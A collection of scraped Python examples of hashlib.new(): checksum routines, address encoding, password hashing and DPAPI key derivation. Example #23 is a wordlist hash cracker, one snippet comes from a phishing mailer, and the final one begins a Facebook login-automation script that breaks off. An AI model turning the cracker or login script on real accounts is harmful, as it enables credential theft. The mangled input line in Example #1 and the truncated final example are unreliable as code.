Example #1
def toHash():
    while True:
        password = input("Password: "******"Encryption type: ")
        
        if hashtype == "ntlm":
            phash = hashlib.new('md4', password.encode('utf-16le')).digest()
            
        elif hashtype == "md4":
            phash = hashlib.new('md4', password.encode('ascii')).digest()

        elif hashtype == "md5":
            phash = hashlib.new('md5', password.encode("ascii")).digest()

        elif hashtype == "whirlpool":
            phash = hashlib.new('whirlpool', password.encode('ascii')).digest()
            
        elif hashtype == "sha1":
            phash = hashlib.sha1(password.encode('ascii')).digest()

        elif hashtype == "sha224":
            phash = hashlib.sha224(password.encode('ascii')).digest()

        elif hashtype == "sha256":
            phash = hashlib.sha256(password.encode('ascii')).digest()

        elif hashtype == "sha384":
            phash = hashlib.sha384(password.encode('ascii')).digest()

        elif hashtype == "sha512":
            phash = hashlib.sha512(password.encode('ascii')).digest()

        print("\n"+str(binascii.hexlify(phash))[2:-1]+"\n")
Example #2
def getContentChecksum(checksum_type, contents):
    if hashlib_has_usedforsecurity:
        engine = hashlib.new(checksum_type, usedforsecurity=False)
    else:
        engine = hashlib.new(checksum_type)
    engine.update(contents)
    return engine.hexdigest()
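
The hashlib_has_usedforsecurity flag used above is not defined in the snippet; it is typically set once by feature detection, since the usedforsecurity keyword only exists on Python 3.9+ and on some FIPS-enabled distribution builds. A minimal sketch, assuming only the standard library:

import hashlib

# Probe whether hashlib.new() accepts the usedforsecurity keyword
# (Python 3.9+, also backported by some FIPS-enabled distributions).
try:
    hashlib.new('sha256', usedforsecurity=False)
    hashlib_has_usedforsecurity = True
except TypeError:
    hashlib_has_usedforsecurity = False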
Example #3
 def test_unknown_hash(self):
     try:
         hashlib.new('spam spam spam spam spam')
     except ValueError:
         pass
     else:
         self.assert_(0 == "hashlib didn't reject bogus hash name")
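
The try/except/else dance above predates assertRaises context managers; a sketch of the same check in the modern unittest idiom:

import hashlib
import unittest

class TestUnknownHash(unittest.TestCase):
    def test_unknown_hash(self):
        # hashlib.new() raises ValueError for unrecognized algorithm names.
        with self.assertRaises(ValueError):
            hashlib.new('spam spam spam spam spam')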
Example #4
def compare_site_and_disk(config, diff, site, docs, push, get):
    '''Handles both compare and push/get, since the code for each is quite similar.'''
    for f in docs:
        full_path = './'+f+'.mediawiki'
        m_ondisk = hashlib.new(config['hashalg'])
        with open(full_path) as fd:
            on_disk = fd.read()
        m_ondisk.update(on_disk)

        m_onsite = hashlib.new(config['hashalg'])
        page = site.Pages[f]
        on_site = page.text().encode('utf-8')+'\n'
        m_onsite.update(on_site)

        if m_ondisk.digest() != m_onsite.digest():
            print("Page {} differ.".format(f))
            if (diff):
                #Just display diff in the correct order, we default to push-side-diff
                if get:
                    mydiff = difflib.unified_diff(on_site.splitlines(1), on_disk.splitlines(1))
                else:
                    mydiff = difflib.unified_diff(on_disk.splitlines(1), on_site.splitlines(1))

                sys.stdout.writelines(mydiff)

            #Now push or get whatever is needed to sync
            #But never do both push and get at once, would make no sense
            if get:
                print("Getting {} from site to disk.".format(f))
                with open(full_path, 'w') as fd:
                    fd.write(on_site)
            elif push:
                print("Pushing {} from disk to site.".format(f))
                page.save(on_disk, summary=u'Automated sync from {}'.format(config['repos']))
Example #5
def encode(msg, key, hashsys, verbose, mutate):
    try:
        hash = hashlib.new(str(hashsys))
    except ValueError:
        print("Error: hash {h} is not supported, defaulting to sha1".format(h=hashsys))
        hashsys = 'sha1'
        hash = hashlib.new(hashsys)  # rebuild the hasher so it is defined below

    msg = msg.replace('\r', "").replace('\n', '')
    key = key.replace('\r', "").replace('\n', '')
    encoded_msg = []
    mutation_key = []
    for x in ([msg[i:i + 2] for i in range(0, len(msg), 2)]):
        if len(x) == 1:
            x += ' '
        if mutate:
            random_bit = chr(int(random.randrange(127, 3500)))
            random_bit_en = binascii.hexlify(random_bit.encode()).decode()
        else:
            random_bit = ''
            random_bit_en = ''
            hash = hashlib.new(str(hashsys))

        if verbose:
            print("Message to be hashed is", x, random_bit, key)
        # if len(random_bit_en) < 5:
        #	random_bit_en += '00'
        hash.update(x.encode() + random_bit.encode() + key.encode())
        encoded_msg.append(hash.hexdigest()[int(len(hash.hexdigest()) / 2):])
        encoded_msg.append(hash.hexdigest()[:int(len(hash.hexdigest()) / 2)])
        if random_bit_en:
            mutation_key.append(random_bit_en)

    return encoded_msg, mutation_key
Example #6
def getHashlibInstance(hash_type, used_for_security):
    """Get an instance of a hashlib object.
    """
    if hashlib_has_usedforsecurity:
        return hashlib.new(hash_type, usedforsecurity=used_for_security)
    else:
        return hashlib.new(hash_type)
Example #7
def generate_file_checksums(sourceFile, tempFile):
    '''
    Generate checksums, etcetera for a file read from 'sourceFile'.
    If 'tempFile' is provided, the bytes are written to it as they are read.
    The result is a tuple comprising the MD5 checksum, the SHA512 checksum,
    the file length, and chunk containing the start of the file (for doing
    mimetype guessing if necessary).
    '''

    from contextlib import closing
    with closing(sourceFile) as f:
        md5 = hashlib.new('md5')
        sha512 = hashlib.new('sha512')
        size = 0
        mimetype_buffer = ''
        for chunk in iter(lambda: f.read(32 * sha512.block_size), ''):
            size += len(chunk)
            if len(mimetype_buffer) < 8096: # Arbitrary memory limit
                mimetype_buffer += chunk
            md5.update(chunk)
            sha512.update(chunk)
            if tempFile:
                tempFile.write(chunk)
    return (md5.hexdigest(), sha512.hexdigest(), 
            size, mimetype_buffer)
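
One caveat: iter(lambda: f.read(...), '') only terminates against the str sentinel '' on Python 2 or for text-mode files; for binary reads on Python 3 the sentinel must be b''. A self-contained Python 3 sketch of the same streaming pattern, with illustrative names:

import hashlib

def file_digests(path, chunk_size=65536):
    # Stream the file once through both hashes; b'' is the binary-mode
    # end-of-file sentinel that the '' above would never match.
    md5 = hashlib.new('md5')
    sha512 = hashlib.new('sha512')
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            md5.update(chunk)
            sha512.update(chunk)
    return md5.hexdigest(), sha512.hexdigest()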
Example #8
    def fingerprint(self):
        """
        Create a fingerprint for this archive
        """
        hashes = {}

        for algorithm in self.algorithms:
            files = {}
            combined = hashlib.new(algorithm)

            for (file, content) in self.reader.readfiles():
                h = hashlib.new(algorithm)
                h.update(content)

                checksum = h.hexdigest()
                files[checksum] = file
                combined.update(checksum)

            hashes[algorithm] = {
                "combined": combined.hexdigest(),
                "files": files,
            }

        return {
            "hashes": hashes
        }
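
Portability note: on Python 3 the combined.update(checksum) call above raises TypeError, because hexdigest() returns str while update() requires bytes. A small self-contained sketch of the combining step with the needed encode:

import hashlib

combined = hashlib.new('sha256')
for payload in (b'file-1 bytes', b'file-2 bytes'):  # stand-ins for file contents
    checksum = hashlib.new('sha256', payload).hexdigest()
    combined.update(checksum.encode('ascii'))  # hexdigest() is str; update() needs bytes
print(combined.hexdigest())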
Example #9
def encodeAddress(version,stream,ripe):
    if version >= 2 and version < 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        if ripe[:2] == '\x00\x00':
            ripe = ripe[2:]
        elif ripe[:1] == '\x00':
            ripe = ripe[1:]
    elif version == 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        ripe = ripe.lstrip('\x00')

    a = encodeVarint(version) + encodeVarint(stream) + ripe
    sha = hashlib.new('sha512')
    sha.update(a)
    currentHash = sha.digest()
    #print 'sha after first hashing: ', sha.hexdigest()
    sha = hashlib.new('sha512')
    sha.update(currentHash)
    #print 'sha after second hashing: ', sha.hexdigest()

    checksum = sha.digest()[0:4]
    #print 'len(a) = ', len(a)
    #print 'checksum = ', checksum.encode('hex')
    #print 'len(checksum) = ', len(checksum)

    asInt = int(a.encode('hex') + checksum.encode('hex'),16)
    #asInt = int(checksum.encode('hex') + a.encode('hex'),16)
    # print asInt
    return 'BM-'+ encodeBase58(asInt)
Example #10
    def _update_payload_digest(self, hunk):
        if self.payload_digest is None:
            # convoluted handling of two newlines crossing hunks
            # XXX write tests for this
            if self._prev_hunk_last_two_bytes.endswith(b'\n'):
                if hunk.startswith(b'\n'):
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[1:])
                    self.payload_offset = self.len + 1
                elif hunk.startswith(b'\r\n'):
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[2:])
                    self.payload_offset = self.len + 2
            elif self._prev_hunk_last_two_bytes == b'\n\r':
                if hunk.startswith(b'\n'):
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[1:])
                    self.payload_offset = self.len + 1
            else:
                m = re.search(br'\n\r?\n', hunk)
                if m is not None:
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[m.end():])
                    self.payload_offset = self.len + m.end()

            # if we still haven't found start of payload hold on to these bytes
            if self.payload_digest is None:
                self._prev_hunk_last_two_bytes = hunk[-2:]
        else:
            self.payload_digest.update(hunk)
Example #11
def generate_file_checksums(sourceFile, tempFile=None, leave_open=False):
    '''DEPRECATED
    Generate checksums, etcetera for a file read from 'sourceFile'.
    If 'tempFile' is provided, the bytes are written to it as they are read.
    The result is a tuple comprising the MD5 checksum, the SHA512 checksum,
    the file length, and chunk containing the start of the file (for doing
    mimetype guessing if necessary).
    '''
    warnings.warn("please replace usages with models/datafile.py:"
                  "compute_checksums", DeprecationWarning)
    sourceFile.seek(0)

    f = sourceFile
    md5 = hashlib.new('md5')
    sha512 = hashlib.new('sha512')
    size = 0
    mimetype_buffer = ''
    for chunk in iter(lambda: f.read(32 * sha512.block_size), ''):
        size += len(chunk)
        if len(mimetype_buffer) < 8096:  # Arbitrary memory limit
            mimetype_buffer += chunk
        md5.update(chunk)
        sha512.update(chunk)
        if tempFile is not None:
            tempFile.write(chunk)
    if leave_open:
        f.seek(0)
    else:
        f.close()
    return (md5.hexdigest(), sha512.hexdigest(),
            size, mimetype_buffer)
Example #12
 def __init__(self, session, config, parent):
     PreParser.__init__(self, session, config, parent)
     self.sumType = self.get_setting(session, 'sumType', 'md5')
     try:
         hashlib.new(self.sumType)
     except ValueError as e:
         raise ConfigFileException(str(e))
Example #13
    def _validate_entries(self):
        """
        Verify that the actual file contents match the recorded hashes stored in the manifest files
        """
        errors = list()

        # To avoid the overhead of reading the file more than once or loading
        # potentially massive files into memory we'll create a dictionary of
        # hash objects so we can open a file, read a block and pass it to
        # multiple hash objects

        hashers = {}
        for alg in self.algs:
            try:
                hashers[alg] = hashlib.new(alg)
            except ValueError:  # hashlib.new() raises ValueError for unknown algorithms
                logging.warning("Unable to validate file contents using unknown %s hash algorithm", alg)

        if not hashers:
            raise RuntimeError("%s: Unable to validate bag contents: none of the hash algorithms in %s are supported!" % (self, self.algs))

        for rel_path, hashes in self.entries.items():
            full_path = os.path.join(self.path, rel_path)

            # Create a clone of the default empty hash objects:
            f_hashers = dict(
                (alg, hashlib.new(alg)) for alg, h in hashers.items() if alg in hashes
            )

            try:
                f_hashes = self._calculate_file_hashes(full_path, f_hashers)
            except BagValidationError, e:
                raise e
            # Any unhandled exceptions are probably fatal
            except:
Example #14
def evpKDF(passwd, salt, key_size=8, iv_size=4, iterations=1, hash_algorithm="md5"):
    target_key_size = key_size + iv_size
    derived_bytes = ""
    number_of_derived_words = 0
    block = None
    hasher = hashlib.new(hash_algorithm)
    while number_of_derived_words < target_key_size:
        if block is not None:
            hasher.update(block)

        hasher.update(passwd)
        hasher.update(salt)
        block = hasher.digest()
        hasher = hashlib.new(hash_algorithm)

        for i in range(1, iterations):
            hasher.update(block)
            block = hasher.digest()
            hasher = hashlib.new(hash_algorithm)

        derived_bytes += block[0: min(len(block), (target_key_size - number_of_derived_words) * 4)]

        number_of_derived_words += len(block)/4

    return {
        "key": derived_bytes[0: key_size * 4],
        "iv": derived_bytes[key_size * 4:]
    }
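
This is the OpenSSL EVP_BytesToKey construction; key_size and iv_size above are counted in 32-bit words, so the defaults yield a 32-byte key and a 16-byte IV. The str concatenation makes the snippet Python 2 specific; a byte-oriented Python 3 sketch of the same loop, with sizes in bytes and illustrative names:

import hashlib

def evp_kdf_bytes(password, salt, key_len=32, iv_len=16, iterations=1, hash_name='md5'):
    # Repeatedly hash previous-block + password + salt until enough bytes exist.
    derived, block = b'', b''
    while len(derived) < key_len + iv_len:
        block = hashlib.new(hash_name, block + password + salt).digest()
        for _ in range(1, iterations):
            block = hashlib.new(hash_name, block).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]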
Example #15
def decodeAddress(address):
    address = str(address).strip()
    if address[:3] == 'BM-': integer = decodeBase58(address[3:])
    else:                    integer = decodeBase58(address)
    if integer == 0: status = 'invalidcharacters';                return status,0,0,''
    hexdata = hex(integer)[2:-1]
    if len(hexdata) % 2 != 0: hexdata = '0' + hexdata
    data = hexdata.decode('hex'); checksum = data[-4:]
    sha = hashlib.new('sha512'); sha.update(data[:-4]); currentHash = sha.digest()
    sha = hashlib.new('sha512'); sha.update(currentHash)
    if checksum != sha.digest()[0:4]: status = 'checksumfailed';  return status,0,0,''
    try: addressVersionNumber, bytesUsedByVersionNumber = decodeVarint(data[:9])
    except varintDecodeError:         status = 'varintmalformed'; return status,0,0,''
    if addressVersionNumber > 4:      status = 'versiontoohigh';  return status,0,0,''
    elif addressVersionNumber == 0:   status = 'versiontoohigh';  return status,0,0,''
    try: streamNumber, bytesUsedByStreamNumber = decodeVarint(data[bytesUsedByVersionNumber:])
    except varintDecodeError:         status = 'varintmalformed'; return status,0,0,''
    status = 'success'
    if addressVersionNumber == 1:                                 return status,addressVersionNumber,streamNumber,data[-24:-4]
    elif addressVersionNumber == 2 or addressVersionNumber == 3:
        embeddedRipeData = data[bytesUsedByVersionNumber+bytesUsedByStreamNumber:-4]
        if   len(embeddedRipeData) > 20:                          return 'ripetoolong', 0,0,''
        elif len(embeddedRipeData) == 20:                         return status,addressVersionNumber,streamNumber,embeddedRipeData
        elif len(embeddedRipeData) == 19:                         return status,addressVersionNumber,streamNumber,'\x00'+embeddedRipeData
        elif len(embeddedRipeData) == 18:                         return status,addressVersionNumber,streamNumber,'\x00\x00'+embeddedRipeData
        elif len(embeddedRipeData) < 18:                          return 'ripetooshort',0,0,''
        else:                                                     return 'otherproblem',0,0,''
    elif addressVersionNumber == 4:
        embeddedRipeData = data[bytesUsedByVersionNumber+bytesUsedByStreamNumber:-4]
        if   embeddedRipeData[0:1] == '\x00':                     return 'encodingproblem',0,0,''
        elif len(embeddedRipeData) > 20:                          return 'ripetoolong',    0,0,''
        elif len(embeddedRipeData) < 4:                           return 'ripetooshort',   0,0,''
        else: x00string = '\x00' * (20 - len(embeddedRipeData));  return status,addressVersionNumber,streamNumber,x00string+embeddedRipeData
Example #16
	def _sender_precheck_attachment(self):
		attachment = self.config.get('mailer.attachment_file')
		if not attachment:
			return True
		if not os.path.isfile(attachment):
			gui_utilities.show_dialog_warning('Invalid Attachment', self.parent, 'The specified attachment file does not exist.')
			return False
		if not os.access(attachment, os.R_OK):
			gui_utilities.show_dialog_warning('Invalid Attachment', self.parent, 'The specified attachment file can not be read.')
			return False
		self.text_insert("File '{0}' will be attached to sent messages.\n".format(os.path.basename(attachment)))
		_, extension = os.path.splitext(attachment)
		extension = extension[1:]
		if self.config['remove_attachment_metadata'] and extension in ('docm', 'docx', 'pptm', 'pptx', 'xlsm', 'xlsx'):
			scrubber.remove_office_metadata(attachment)
			self.text_insert("Attachment file detected as MS Office 2007+, metadata has been removed.\n")
		md5 = hashlib.new('md5')
		sha1 = hashlib.new('sha1')
		with open(attachment, 'rb') as file_h:
			data = True
			while data:
				data = file_h.read(1024)
				md5.update(data)
				sha1.update(data)
		self.text_insert("  MD5:  {0}\n".format(md5.hexdigest()))
		self.text_insert("  SHA1: {0}\n".format(sha1.hexdigest()))
		return True
Example #17
 def public_hash(self, algorithm):
     if 'md5' == algorithm:
         hash_object = hashlib.new('md5')
     else:
         hash_object = hashlib.new('sha256')
     hash_object.update(self.email.lower().encode('utf-8'))
     return hash_object.hexdigest()
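
Hashing a lower-cased e-mail address like this is the Gravatar-style identifier scheme; a standalone usage sketch with a made-up address:

import hashlib

email = 'User@Example.com'  # illustrative
print(hashlib.new('md5', email.lower().encode('utf-8')).hexdigest())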
Example #18
    def _make_hash(algorithm, iterations, raw_password, salt):
        # Private: Do the actual hashing operation.

        hash = hashlib.new(algorithm, (raw_password+salt).encode())
        for i in range(iterations-1): hash = hashlib.new(algorithm, hash.digest()+(raw_password+salt).encode())

        return hash.hexdigest()
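
Iterating a plain hash over password+salt is an ad-hoc key-stretching scheme; the standard library ships a vetted equivalent in hashlib.pbkdf2_hmac. A sketch with illustrative parameters:

import hashlib
import os

salt = os.urandom(16)
# 100,000 rounds of HMAC-SHA256 over the password and salt; returns 32 raw bytes.
derived = hashlib.pbkdf2_hmac('sha256', b'raw_password', salt, 100_000)
print(derived.hex())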
Example #19
def avatar_file_path(instance=None, filename=None, size=None, ext=None):
    tmppath = [AVATAR_STORAGE_DIR]
    if AVATAR_HASH_USERDIRNAMES:
        username_hash = hashlib.new("ripemd160")
        username_hash.update(instance.user.username)
        tmp = username_hash.hexdigest()
        tmppath.extend([tmp[0], tmp[1], instance.user.username])
    elif AVATAR_USERDIRNAMES_AS_ID:
        tmppath.append(str(instance.user.id))
    else:
        tmppath.append(instance.user.username)
    if not filename:
        # Filename already stored in database
        filename = instance.avatar.name
        if ext and AVATAR_HASH_FILENAMES:
            # An extension was provided, probably because the thumbnail
            # is in a different format than the file. Use it. Because it's
            # only enabled if AVATAR_HASH_FILENAMES is true, we can trust
            # it won't conflict with another filename
            (root, oldext) = os.path.splitext(filename)
            filename = root + "." + ext
    else:
        # File doesn't exist yet
        if AVATAR_HASH_FILENAMES:
            filename_hash = hashlib.new("ripemd160")
            (root, ext) = os.path.splitext(filename)
            filename_hash.update(smart_str(filename))
            filename = filename_hash.hexdigest()
            filename = filename + ext
    if size:
        tmppath.extend(['resized', str(size)])
    tmppath.append(os.path.basename(filename))
    return os.path.join(*tmppath)
Example #20
 def add_nomaxbackups(self, name, input_io):
     name = self.validate_name(name)
     logging.debug('Adding to %r', name)
     timestamp = self.validate_timestamp(datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'))
     instancedir = self.instancedir(name, timestamp)
     if os.path.exists(instancedir):
         raise RuntimeError('Directory already exists: %r' % (instancedir,))
     if input_io == sys.stdin:
         logging.info('Reading from stdin')
     else:
         logging.debug('Reading from %r', input_io.name)
     hash_total = hashlib.new(self.algorithm)
     size_total = 0
     for partnr in itertools.count(0):
         data = input_io.read(self.partsize)
         if len(data) == 0:
             break
         hash_total.update(data)
         size_total += len(data)
         if partnr >= self.maxparts:
             raise RuntimeError('Too many parts')
         filelen = 3
         partlen = max(filelen + 1, len(str(self.maxparts - 1)))
         part = str(partnr).rjust(partlen, '0')
         hexdigest = hashlib.new(self.algorithm, data).hexdigest()
         target = os.path.join('..', '..', '..', self.hash_filename(hexdigest))
         symlink_filename = os.path.join(instancedir, part[:-filelen], part[-filelen:])
         self.util.symlink(target, symlink_filename)
         data_filename = os.path.join(self.directory, self.hash_filename(hexdigest))
         if os.path.exists(data_filename) and os.path.getsize(data_filename) == len(data):
             logging.debug('Skipping existing complete data file %r', data_filename)
         else:
             self.util.write_file(data_filename, data)
     self.util.write_file(os.path.join(instancedir, 'hash'), '%s\n' % (hash_total.hexdigest(),))
     self.util.write_file(os.path.join(instancedir, 'size'), '%d\n' % (size_total,))
Example #21
def encodeAddress(version,stream,ripe):
    if version >= 2 and version < 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        if ripe[:2] == '\x00\x00':
            ripe = ripe[2:]
        elif ripe[:1] == '\x00':
            ripe = ripe[1:]
    elif version == 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        ripe = ripe.lstrip('\x00')

    storedBinaryData = encodeVarint(version) + encodeVarint(stream) + ripe
    
    # Generate the checksum
    sha = hashlib.new('sha512')
    sha.update(storedBinaryData)
    currentHash = sha.digest()
    sha = hashlib.new('sha512')
    sha.update(currentHash)
    checksum = sha.digest()[0:4]

    asInt = int(hexlify(storedBinaryData) + hexlify(checksum),16)
    return 'BM-'+ encodeBase58(asInt)
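
The two-pass SHA-512 above computes Bitmessage's 4-byte address checksum; a byte-oriented sketch of just that step, with a placeholder payload:

import hashlib

def bm_checksum(payload):
    # First 4 bytes of sha512(sha512(payload)), as in encodeAddress() above.
    inner = hashlib.new('sha512', payload).digest()
    return hashlib.new('sha512', inner).digest()[:4]

print(bm_checksum(b'\x04\x01' + b'\x00' * 20).hex())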
Example #22
def CryptSessionKeyXP(masterkey, nonce, hashAlgo, entropy=None, strongPassword=None):
    """Computes the decryption key for XP DPAPI blob, given the masterkey and optional information.

    This implementation relies on a faulty implementation from Microsoft that does not respect the HMAC RFC.
    Instead of updating the inner pad, we update the outer pad...
    This algorithm is also used when checking the HMAC for integrity after decryption

    :param masterkey: decrypted masterkey (should be 64 bytes long)
    :param nonce: this is the nonce contained in the blob or the HMAC in the blob (integrity check)
    :param entropy: this is the optional entropy from CryptProtectData() API
    :param strongPassword: optional password used for decryption or the blob itself (integrity check)
    :returns: decryption key
    :rtype : str
    """
    if len(masterkey) > 20:
        masterkey = hashlib.sha1(masterkey).digest()

    masterkey += "\x00" * hashAlgo.blockSize
    ipad = "".join(chr(ord(masterkey[i]) ^ 0x36) for i in range(hashAlgo.blockSize))
    opad = "".join(chr(ord(masterkey[i]) ^ 0x5c) for i in range(hashAlgo.blockSize))
    digest = hashlib.new(hashAlgo.name)
    digest.update(ipad)
    digest.update(nonce)
    tmp = digest.digest()

    digest = hashlib.new(hashAlgo.name)
    digest.update(opad)
    digest.update(tmp)
    if entropy is not None:
        digest.update(entropy)
    if strongPassword is not None:
        digest.update(strongPassword)
    return digest.digest()
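
For contrast with the deliberately non-standard construction the docstring describes, the RFC-compliant HMAC it alludes to is a single call in the standard library:

import hashlib
import hmac

# Standard (RFC 2104) HMAC for comparison; CryptSessionKeyXP above instead
# folds the entropy/strongPassword data into the outer-pad digest.
def rfc_hmac(key, msg, hash_name='sha1'):
    return hmac.new(key, msg, getattr(hashlib, hash_name)).digest()

print(rfc_hmac(b'masterkey', b'nonce').hex())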
Example #23
def crack(hash, dict, alg):
  f = open(dict,'r')
  for line in f:
    line = line.rstrip()
    if alg==1:
      h = hashlib.new('md5')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==2:
      h = hashlib.new('sha1')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==3:
      h = hashlib.new('sha256')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==4:
      h = hashlib.new('sha512')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==5:
      try:
        hash_line = binascii.hexlify(hashlib.new('md4', line.encode('utf-16le')).digest())
      except Exception:
        continue
    if hash_line == hash:
      print '[*] Hash decrypted! Plaintext is "' + line+'"'
      sys.exit(0)   
  print "hash not found."
Example #24
def _hash(irc, source, args):
    """<password> [digest]
    Hashes a given password with the given digest; if 'digest' isn't given, defaults to sha256"""
    digest = ""
    try:
        password = args[0]
        password = password.encode('utf-8')
        try:
            digest = args[1]
        except IndexError:
            digest = "sha256"
        # DRY'ing
        digests = hashlib.algorithms_available
        if digest:
            if digest in digests:
                d = hashlib.new("%s" % digest)
                d.update(password)
                irc.reply(d.hexdigest(), private=True)
            else:
                irc.error("hash algorithm '%s' unavailable, see 'algorithms'" % digest, private=True)
        else:
            d = hashlib.new("sha256")
            d.update(password)
            irc.reply(d.hexdigest(), private=True)
    except IndexError:
        irc.error("Not enough arguments. Needs 1-2: password, digest (optional).", private=True)
Example #25
def hash(value, algorithm='sha512'):
    '''
    .. versionadded:: 2014.7.0

    Encodes a value with the specified encoder.

    value
        The value to be hashed.

    algorithm : sha512
        The algorithm to use. May be any valid algorithm supported by
        hashlib.

    CLI Example:

    .. code-block:: bash

        salt '*' random.hash 'I am a string' md5
    '''
    if hasattr(hashlib, 'algorithms') and algorithm in hashlib.algorithms:
        hasher = hashlib.new(algorithm)
        hasher.update(value)
        out = hasher.hexdigest()
    elif hasattr(hashlib, algorithm):
        hasher = hashlib.new(algorithm)
        hasher.update(value)
        out = hasher.hexdigest()
    else:
        raise SaltInvocationError('You must specify a valid algorithm.')

    return out
Example #26
    def __init__(self, auth_ref, unscoped_token=None):
        # User-related attributes
        self.user = {'id': auth_ref.user_id, 'name': auth_ref.username}
        self.user_domain_id = auth_ref.user_domain_id
        self.user_domain_name = auth_ref.user_domain_name

        # Token-related attributes
        self.id = auth_ref.auth_token
        self.unscoped_token = unscoped_token
        if _TOKEN_HASH_ENABLED and self._is_pki_token(self.id):
            algorithm = getattr(settings, 'OPENSTACK_TOKEN_HASH_ALGORITHM',
                                'md5')
            hasher = hashlib.new(algorithm)
            hasher.update(self.id.encode('utf-8'))
            self.id = hasher.hexdigest()
            # Only hash unscoped token if needed
            if self._is_pki_token(self.unscoped_token):
                hasher = hashlib.new(algorithm)
                hasher.update(self.unscoped_token.encode('utf-8'))
                self.unscoped_token = hasher.hexdigest()
        self.expires = auth_ref.expires

        # Project-related attributes
        self.project = {'id': auth_ref.project_id, 'name': auth_ref.project_name}
        self.tenant = self.project

        # Domain-related attributes
        self.domain = {'id': auth_ref.domain_id, 'name': auth_ref.domain_name}

        # Federation-related attributes
        self.is_federated = auth_ref.is_federated
        self.roles = [{'name': role} for role in auth_ref.role_names]
        self.serviceCatalog = auth_ref.service_catalog.catalog
Example #27
def main():
  """Read all input files and output the blushlist file."""
  if len(sys.argv) < 4:
    sys.exit("Usage: make_blushlist.py <output_file> {<input_file_i> "
             "<category_i>}")

  f_out = open(sys.argv[1], "w")
  f_out.write("// This file is automatically generated by make_blushlist.py\n")
  f_out.write("let blushlist = {\n")
  i = 2

  hasher = hashlib.new('sha256')
  version_hasher = hashlib.new('sha256')
  # Process all of the files, one by one
  while i < len(sys.argv):
    try:
      f_in = open(sys.argv[i], "r")
    except IOError as ex:
      sys.exit("Can't find file: %s" % ex)
    category = sys.argv[i + 1]
    version_hasher.update(category)
    for line in f_in.readlines():
      line = line.strip().lower()
      hasher.update(line)
      f_out.write("  \"%s\" : \"%s\",\n" % (hasher.hexdigest()[:48], category))
      hasher = hashlib.new('sha256')
      version_hasher.update(line)
    f_in.close()
    i += 2

  f_out.write("};\n")
  f_out.write("module.exports.map = blushlist;\n")
  f_out.write("module.exports.version = \"%s\";\n" % version_hasher.hexdigest())

  f_out.close()
Example #28
def get(path, headers, body):
  global logger

  query = headers.get('QUERY')
  arguments = helpers.parse_query_string(query)

  try:
    priv = load_private()
    identity = decrypt(arguments['identity'], priv)
    if is_email(identity):
      password = decrypt(arguments['password'], priv)
      password = hashlib.new('md5', password).hexdigest()
      create_with_email(identity, password)
    elif is_phone_number(identity):
      password = decrypt(arguments['password'], priv)
      password = hashlib.new('md5', password).hexdigest()
      create_with_phone_number(identity, password)
    else:
      pass

    return 200, 'OK', message, {
      'Content-Type': 'text/plain'}
  except rsa.DecryptionError:
    logger.error(helpers.format_exception())
    return 500, 'Internal Server Error', 'Decryption failed', {}
Example #29
  def oc_checksum(self, path, bufsize=1024*1024*4):
    """
    Returns a checksum string as introduced in oc_filecache with version 10.0.4
    The code reads the file in chunks of bufsize once and does all needed computations
    on the fly. Linear cpu usage with filesize, but constant memory.
    """
    file = io.open(path, "rb")
    buf = bytearray(bufsize)
    a32_sum  = 1
    md5_sum  = hashlib.new('md5')
    sha1_sum = hashlib.new('sha1')

    while True:
      n = file.readinto(buf)
      if n == 0: break
      # must checksum in chunks, or python 2.7 explodes on a 20GB file with "OverflowError: size does not fit in an int"
      a32_sum = zlib.adler32(bytes(buf)[0:n], a32_sum)
      md5_sum.update(bytes(buf)[0:n])
      sha1_sum.update(bytes(buf)[0:n])
    file.close()

    sha1 = sha1_sum.hexdigest()
    md5  = md5_sum.hexdigest()
    a32  = "%08x" % (0xffffffff & a32_sum)
    return 'SHA1:'+sha1+' MD5:'+md5+' ADLER32:'+a32
Example #30
 def hashpassword(name,salt,plaintextpassword,n=10):
     if n<1 : raise ValueError("n < 1")
     d = hashlib.new(name,(salt+plaintextpassword).encode()).digest()
     while n:
         n -= 1
         d = hashlib.new(name,d).digest()
     return hashlib.new(name,d).hexdigest()
Example #31
def get_hash(path, hash_type="sha512"):
    h = hashlib.new(hash_type)
    with open(path, "rb") as f:
        for chunk in iter(functools.partial(f.read, 4096), b''):
            h.update(chunk)
    return h.hexdigest()
Example #32
 def make_file_data(cls, string="file"):
     file_data = (string * 10).encode('utf-8')
     h = hashlib.new(HASH_TYPE)
     h.update(file_data)
     file_hash = h.hexdigest()
     return file_data, file_hash
Example #33
 def make_table_data(cls, string="table"):
     table_data = (string * 10).encode('utf-8')
     h = hashlib.new(HASH_TYPE)
     h.update(table_data)
     table_hash = h.hexdigest()
     return table_data, table_hash
Example #34
def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 50 * "\033[1;96m▪"

        print(
            '          \033[1;97m[◉] \x1b[1;96mLogin New Fresh Account \033[1;97m[◉]'
        )
        id = raw_input(
            '          \033[1;97m[◉] \033[1;97mID/Email \x1b[1;91m: \x1b[1;92m'
        )
        pwd = raw_input(
            '          \033[1;97m[◉] \033[1;97mPassword \x1b[1;91m: \x1b[1;92m'
        )
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print "\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:

